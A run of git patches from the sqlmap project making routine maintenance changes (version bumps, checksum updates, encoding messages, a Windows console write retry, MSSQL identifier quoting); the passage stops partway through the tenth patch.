From 439f8247b6fd0dad3c9e76cb9ea32c97d5a5b89e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Jan 2018 01:08:47 +0100 Subject: [PATCH 001/428] Revert of version string --- extra/shutils/precommit-hook.sh | 30 +++++++++++++++--------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 17 insertions(+), 17 deletions(-) diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index c859236db51..3c2137ce239 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -12,21 +12,21 @@ CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 -# if [ -f $SETTINGS_FULLPATH ] -# then -# LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') -# declare -a LINE -# INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") -# if [ -n "$INCREMENTED" ] -# then -# sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH -# echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" -# else -# echo "Something went wrong in VERSION increment" -# exit 1 -# fi -# git add "$SETTINGS_FULLPATH" -# fi +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi truncate -s 0 "$CHECKSUM_FULLPATH" cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d14dbc3064..2b940310793 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2" +VERSION = "1.2.1.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 56fec0b03d3..41e37c28d6a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e5967d7d5119cf82bb78949a40fa0486 lib/core/settings.py +4fcb7ad3d64d8b8d7874c8097a1102e9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From e0dee9418d4cefdeca7ac79d7c43fbf5fad5648b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 8 Jan 2018 01:21:29 +0100 Subject: [PATCH 002/428] Fixes #2866 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 3024e373e46..e129d77609e 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -868,7 +868,7 @@ def boldifyMessage(message): def setColor(message, bold=False): retVal = message - level = extractRegexResult(r"\[(?P[A-Z ]+)\]", message) or kb.get("stickyLevel") + level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_ for _ in dir(logging) if _ == _.upper()), message) or kb.get("stickyLevel") if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler if bold: diff --git a/lib/core/settings.py b/lib/core/settings.py index 2b940310793..f5f1c6988b8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.5" +VERSION = "1.2.1.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 41e37c28d6a..a6cf9f4dfaa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -787f1b610fec311c8ed26a1a36993fae lib/core/common.py +e77e4b8164602351d7e7a0fd96db30f8 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4fcb7ad3d64d8b8d7874c8097a1102e9 lib/core/settings.py +a7506d334169334f86955e6016e2b6ab lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From f6738adc04e2c3c9a309f1b5a0773152e0460c46 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 12 Jan 2018 16:17:57 +0100 Subject: [PATCH 003/428] Abracadabra #2790 --- lib/core/settings.py | 2 +- thirdparty/colorama/ansitowin32.py | 12 +++++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f5f1c6988b8..8c8562cb390 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.6" +VERSION = "1.2.1.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/colorama/ansitowin32.py b/thirdparty/colorama/ansitowin32.py index b7ff6f2136e..e2a43a54499 100644 --- a/thirdparty/colorama/ansitowin32.py +++ b/thirdparty/colorama/ansitowin32.py @@ -171,9 +171,19 @@ def write_and_convert(self, text): def write_plain_text(self, text, start, end): if start < end: - self.wrapped.write(text[start:end]) + self._write(text[start:end]) self.wrapped.flush() + # Reference: https://github.com/robotframework/robotframework/commit/828c67695d85519e4435c556c43ed1b00985df05 + # Workaround for Windows 10 console bug: + # https://github.com/robotframework/robotframework/issues/2709 + def _write(self, text, retry=5): + try: + self.wrapped.write(text) + except IOError, err: + if not (err.errno == 0 and retry > 0): + raise + self._write(text, retry-1) def convert_ansi(self, paramstring, command): if self.convert: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a6cf9f4dfaa..cddf0f3ba9b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a7506d334169334f86955e6016e2b6ab lib/core/settings.py +f0a078744355f8eba214f960c810cdf9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -328,7 +328,7 @@ bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py 658da0466b798cc70f48f35fe49b7813 thirdparty/clientform/clientform.py 722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py 0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py -e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py +93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py From a59198d1e4ba6de3a4b9cce64ac1830e24575eb2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 09:48:07 +0100 Subject: [PATCH 004/428] Minor just in case patch (to prevent junk reports) --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8c8562cb390..cd950f3497e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.7" +VERSION = "1.2.1.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index c2fc73d31a8..d0d6d0bbb7c 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -218,7 +218,7 @@ def checkCharEncoding(encoding, warn=True): try: codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) except (LookupError, ValueError): - if warn: + if warn and ' ' not in encoding: warnMsg = "unknown web page charset '%s'. " % encoding warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS singleTimeLogMessage(warnMsg, logging.WARN, encoding) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cddf0f3ba9b..aa5f40b9526 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f0a078744355f8eba214f960c810cdf9 lib/core/settings.py +cb8195e0a49997deb60e00e9abb6e5bc lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -66,7 +66,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 307d4001682f38dd574548d98c0f1c3e lib/parse/payloads.py 38563853a32dd677ce6c65a0945d7227 lib/parse/sitemap.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py -054a83429e2538293175d6a7242f2e63 lib/request/basic.py +eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py a38e09038468387b20e978ce1b885018 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From e5ab678db0fab1b1e6830caf25e02f3938264ee6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 13:43:50 +0100 Subject: [PATCH 005/428] Fixes #2856 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index e129d77609e..ad2d46c4352 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4186,7 +4186,7 @@ def _(value): except UnicodeDecodeError: pass if not isinstance(retVal, unicode): - retVal = getUnicode(retVal, "utf8") + retVal = getUnicode(retVal, conf.encoding or "utf8") return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index cd950f3497e..de102bdec2d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.8" +VERSION = "1.2.1.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aa5f40b9526..5583a0e7590 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -e77e4b8164602351d7e7a0fd96db30f8 lib/core/common.py +11ecba8ab05ea12e5ac4f502a437eccf lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cb8195e0a49997deb60e00e9abb6e5bc lib/core/settings.py +fade730caa296418caad4448c378b5f2 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 18626656ec2dca54e1f60b0331fd6ad004f50944 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 13:53:46 +0100 Subject: [PATCH 006/428] Minor patch --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index be4c321b757..13b1103d4ef 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2584,9 +2584,9 @@ def _basicOptionValidation(): if conf.encoding: _ = checkCharEncoding(conf.encoding, False) if _ is None: - errMsg = "unknown charset '%s'. Please visit " % conf.encoding + errMsg = "unknown encoding '%s'. Please visit " % conf.encoding errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE - errMsg += "supported charsets" + errMsg += "supported encodings" raise SqlmapSyntaxException(errMsg) else: conf.encoding = _ diff --git a/lib/core/settings.py b/lib/core/settings.py index de102bdec2d..2a591a1c809 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.9" +VERSION = "1.2.1.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5583a0e7590..52143a3de78 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -8ca14b6faf28d2e5a2703ed5e7d6cce2 lib/core/option.py +ac01954e9881b5ba6e41b85e6c08bd9a lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fade730caa296418caad4448c378b5f2 lib/core/settings.py +e90193e32f636c09e0e668e3f550bcc9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 94c170d39226d8551f0aa0298daec8ecd006f846 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 14:04:41 +0100 Subject: [PATCH 007/428] Minor refactoring --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index ad2d46c4352..55be08d136e 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1400,9 +1400,9 @@ def parseTargetUrl(): if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): if ":443/" in conf.url: - conf.url = "https://" + conf.url + conf.url = "https://%s" % conf.url else: - conf.url = "http://" + conf.url + conf.url = "http://%s" % conf.url if kb.customInjectionMark in conf.url: conf.url = conf.url.replace('?', URI_QUESTION_MARKER) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2a591a1c809..dac6c06eede 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.10" +VERSION = "1.2.1.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 52143a3de78..bf41cbaba8b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -11ecba8ab05ea12e5ac4f502a437eccf lib/core/common.py +85de1b2ef240f740478841185f0743c2 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e90193e32f636c09e0e668e3f550bcc9 lib/core/settings.py +9f41a4088761dda067b7575f0cd4a7eb lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From cea9d1c75e9c7600a1c4d492595c2691ca3ff58b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 21 Jan 2018 11:11:20 +0100 Subject: [PATCH 008/428] Patch related to the #2890 --- lib/core/common.py | 10 +++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 55be08d136e..06a4799bd8c 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3562,7 +3562,7 @@ def safeSQLIdentificatorNaming(name, isTable=False): _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) if _: - retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "", retVal) + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "%s." % DEFAULT_MSSQL_SCHEMA, retVal) if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) retVal = unsafeSQLIdentificatorNaming(retVal) @@ -3573,8 +3573,12 @@ def safeSQLIdentificatorNaming(name, isTable=False): retVal = "\"%s\"" % retVal elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): retVal = "\"%s\"" % retVal.upper() - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)): - retVal = "[%s]" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + parts = retVal.split('.', 1) + for i in xrange(len(parts)): + if ((parts[i] or " ")[0].isdigit() or not re.match(r"\A\w+\Z", parts[i], re.U)): + parts[i] = "[%s]" % parts[i] + retVal = '.'.join(parts) if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index dac6c06eede..3a55b5cbb08 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.11" +VERSION = "1.2.1.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bf41cbaba8b..9db49e57a42 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -85de1b2ef240f740478841185f0743c2 lib/core/common.py +8bfcc9511c4956ad22b62aa2c8f6386e lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f41a4088761dda067b7575f0cd4a7eb lib/core/settings.py +1887ce5c0983ffbeda639e3110a54521 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 4b9613e3629584da8bdac6c99a6590ae7879778e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 21 Jan 2018 11:49:50 +0100 Subject: [PATCH 009/428] Trivial update --- lib/core/settings.py | 2 +- lib/core/update.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3a55b5cbb08..114dc92ec5b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.12" +VERSION = "1.2.1.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index 5544fdbf3d0..fee57e8e41e 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -32,7 +32,7 @@ def update(): errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" logger.error(errMsg) else: - infoMsg = "updating sqlmap to the latest development version from the " + infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9db49e57a42..f127191b495 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1887ce5c0983ffbeda639e3110a54521 lib/core/settings.py +390a33fe4fce640f5f226a68a7007778 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -35a1b50e3687e1a174073b46c8022c81 lib/core/update.py +1c2e5a9a34d4778c336a3d66d86ad000 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From fc06d4d9cbc2362fdaf981bec119c96213f174c4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 21 Jan 2018 11:54:42 +0100 Subject: [PATCH 010/428] Adding full OS info in error reports --- lib/core/common.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 06a4799bd8c..63d5f36cd31 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -19,6 +19,7 @@ import logging import ntpath import os +import platform import posixpath import random import re @@ -3289,7 +3290,7 @@ def unhandledExceptionMessage(): errMsg += "and get back to you\n" errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION - errMsg += "Operating system: %s\n" % PLATFORM + errMsg += "Operating system: %s\n" % platform.platform() errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None)) errMsg += "Back-end DBMS:" diff --git a/lib/core/settings.py b/lib/core/settings.py index 114dc92ec5b..67007eb7a83 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.13" +VERSION = "1.2.1.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} 